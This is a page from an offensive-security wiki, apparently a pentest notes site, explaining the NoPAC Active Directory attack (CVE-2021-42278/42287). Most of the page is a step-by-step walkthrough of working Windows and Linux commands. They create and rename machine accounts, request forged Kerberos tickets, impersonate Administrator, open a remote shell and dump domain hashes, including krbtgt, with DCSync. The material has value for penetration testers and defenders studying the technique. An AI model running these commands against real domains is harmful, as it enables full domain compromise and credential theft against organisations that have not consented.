CAPEactive-directorykerberossAMAccountName spoofing

NoPAC

The NoPAC attack is a chained exploitation technique that combines two vulnerabilities: a privilege escalation method called sAMAccountName spoofing and a Key Distribution Center (KDC) flaw.

The first vulnerability, sAMAccountName spoofing (CVE-2021-42278), relies on an attacker having permission to modify the sAMAccountName attribute of, typically, a machine account. The attacker changes this attribute so that it matches the name of a Domain Controller (DC), but without the trailing $. For example, from DC01$ to DC01.

The second vulnerability, NoPAC (CVE-2021-42287), exists in the KDC. When the KDC receives a request for a service ticket (TGS) for an account that does not exist, it automatically appends a $ to the account name and attempts to resolve it again. This behaviour can cause the KDC to mistakenly associate the request with the legitimate machine account.

A system vulnerable to NoPAC is not necessarily vulnerable to sAMAccountName spoofing. Both conditions must be present for the full attack chain to succeed.

A key component in this process is the Privilege Attribute Certificate (PAC). The PAC contains critical information about the authenticated user, including:

The user’s Security Identifier (SID)
Group SIDs
User rights and privileges
Logon information

When a user requests a TGT, the KDC embeds the PAC in the ticket. Services later rely on this information to make authorization decisions. If a DC returns a TGT without a PAC, the normal authorization checks can be bypassed, potentially allowing an attacker to gain elevated privileges.

Attack

The NoPAC attack typically proceeds through the following steps:

Create a new computer account (e.g., TEST01) and remove the automatically created Service Principal Names (SPNs). In some cases, an existing machine account or a user account can also be used.
Modify the sAMAccountName of the computer account so that it matches the DC name, but without the trailing $.
Request a TGT using the credentials of the modified machine account.
Restore the original sAMAccountName value.
Use S4U2Self to request a TGS that impersonates a privileged user such as Administrator.

Windows

The noPac binary can be used to determine whether a DC is vulnerable to the NoPAC attack. The tool requests a TGT without a PAC. If the DC is vulnerable, the returned ticket is typically smaller than 1000 bytes, indicating that the PAC was not included.

# Enumerate if the DC is vulnerable to NoPac
> .\noPac.exe scan -domain marvel.local -user x7331 -pass 'Passw0rd123!'
[+] Got TGT from DC01.marvel.local. Ticket size: 567

Next, the MachineAccountQuota (MAQ) value should be checked. By default, this setting allows a standard domain user to join up to 10 machines to the domain. It is also useful to determine how many machine accounts a specific user has already created by querying the ms-DS-CreatorSID attribute on computer objects.

Even if MAQ is set to its default value, Access Control Lists (ACLs) may still prevent a user from creating new machine accounts.

# Enumerate MAQ
> (Get-DomainObject -SearchScope Base)."ms-ds-machineaccountquota"
10

# Enumerate the number of machines that a user has created (PowerView)
> $computers = Get-DomainComputer -Filter '(ms-DS-CreatorSID=*)' -Properties name,ms-ds-creatorsid
> $x7331Computers = $computers | where { (New-Object System.Security.Principal.SecurityIdentifier($_."ms-ds-creatorsid",0)).Value -eq (ConvertTo-SID aneudy) }
> $x7331Computers.Count
10

# Create a new machine account (Powermad)
Import-Module .\Powermad.ps1
$password = ConvertTo-SecureString 'Password123' -AsPlainText -Force
New-MachineAccount -MachineAccount "TEST01" -Password $($password) -Domain marvel.local -DomainController 172.18.88.10 -Verbose

# Clear the SPNs (PowerView)
Import-Module .\PowerView.ps1
Set-DomainObject -Identity 'TEST01$' -Clear 'serviceprincipalname' -Domain marvel.local -DomainController 172.18.88.10 -Verbose

# Change the sAMAccountName to match DC03
Set-MachineAccountAttribute -MachineAccount "TEST01" -Value "dc01" -Attribute samaccountname -Domain marvel.local -DomainController 172.18.88.10 -Verbose

# Request a TGT as DC03 using TEST01 creds
.\Rubeus.exe asktgt /user:dc01 /password:"Password123" /domain:marvel.local /dc:172.18.88.10 /nowrap

# Revert the sAMAccountName of TEST01
Set-MachineAccountAttribute -MachineAccount "TEST01" -Value "TEST01" -Attribute samaccountname -Domain marvel.local -DomainController 172.18.88.10 -Verbose

# Leverage S4USelf to request a TGS as Administrator to any service required (LDAP -> DCSync)
.\Rubeus.exe s4u /self /impersonateuser:Administrator /altservice:"ldap/dc01.marvel.local" /dc:172.18.88.10 /ptt /ticket:doI...

# DCSync
.\mimikatz.exe "lsadump::dcsync /domain:marvel.local /kdc:dc01.marvel.local /user:krbtgt" exit

Linux

In addition to machine accounts, this attack can also be performed using user accounts. For example, if user x7331 has GenericAll permissions over another user (e.g., bob), the attack can be carried out through that account instead. In this scenario, the target user must have an empty SPN attribute.

On Linux systems, the NoPAC scanner can be used to determine whether a DC is vulnerable.

# Enumerate if the DC is vulnerable to NoPac
$ python3 noPac/scanner.py -dc-ip 10.129.229.224 marvel.local/x7331:'Passw0wrd123!' -use-ldap
[*] Current ms-DS-MachineAccountQuota = 10
[*] Got TGT with PAC from 10.129.229.224. Ticket size 1517
[*] Got TGT from 10.129.229.224. Ticket size 752

# Check if the target user has SPNs
$ python3 bloodyAD.py -d marvel.local -u x7331 -p 'Passw0rd123!' --host 10.129.229.224 get object bob | grep "servicePrincipalName\|sAMAccountName"
sAMAccountName: bob
servicePrincipalName: IMAP/srv03

# Clear the SPN
python3 bloodyAD.py -d marvel.local -u x7331 -p 'Passw0rd123!' --host 10.129.229.224 set object bob servicePrincipalName

# Change the sAMAccountName to match DC01
python3 bloodyAD.py -d marvel.local -u x7331 -p 'Passw0rd123!' --host 10.129.229.224 set object bob sAMAccountName -v DC01

# Request a TGT as DC01 using bob's creds
getTGT.py marvel.local/dc01:Pass123456 -dc-ip 10.129.229.224

# Revert the SPN
python3 bloodyAD.py -d marvel.local -u x7331 -p 'Passw0rd123!' --host 10.129.229.224 set object DC01 sAMAccountName -v bob

# Leverage S4USelf to request a TGS as Administrator to any service required 
# (CIFS -> File System)
KRB5CCNAME=dc01.ccache
getST.py marvel.local/dc01 -self -impersonate 'Administrator' -altservice 'cifs/dc01.marvel.local' -k -no-pass -dc-ip 10.129.229.224

# Access DC01 as Administrator
KRB5CCNAME=Administrator@cifs_dc01.marvel.local@MARVEL.LOCAL.ccache 
psexec.py dc01.marvel.local -k -no-pass

The attack can be also performed with NetExec and noPac.

# Enumerate if the DC is vulnerable to NoPac (NetExec)
nxc smb dc01 -u x7331 -p 'Passw0rd123!' -M nopac

# Get the NoPAC TGS
python noPac.py marvel.local/x7331:'Passw0rd123!' -dc-ip 10.211.55.203

# Get RCE
python noPac.py marvel.local/x7331:'Passw0rd123!' -dc-ip 10.211.55.203 -dc-host DC01 -shell --impersonate administrator

# Dump hashes
python noPac.py marvel.local/x7331:'Passw0rd123!' -dc-ip 10.211.55.203 -dc-host DC01 --impersonate administrator -dump

# Dump a specific hash
python noPac.py marvel.local/x7331:'Passw0rd123!' -dc-ip 10.211.55.203 -dc-host DC01 --impersonate administrator -dump -just-dc-user marvel/krbtgt

PreviousLogon Scripts NextNTLM Relay

Last updated 17 days ago

hashtagAttack

hashtagWindows

hashtagLinux

Attack

Windows

Linux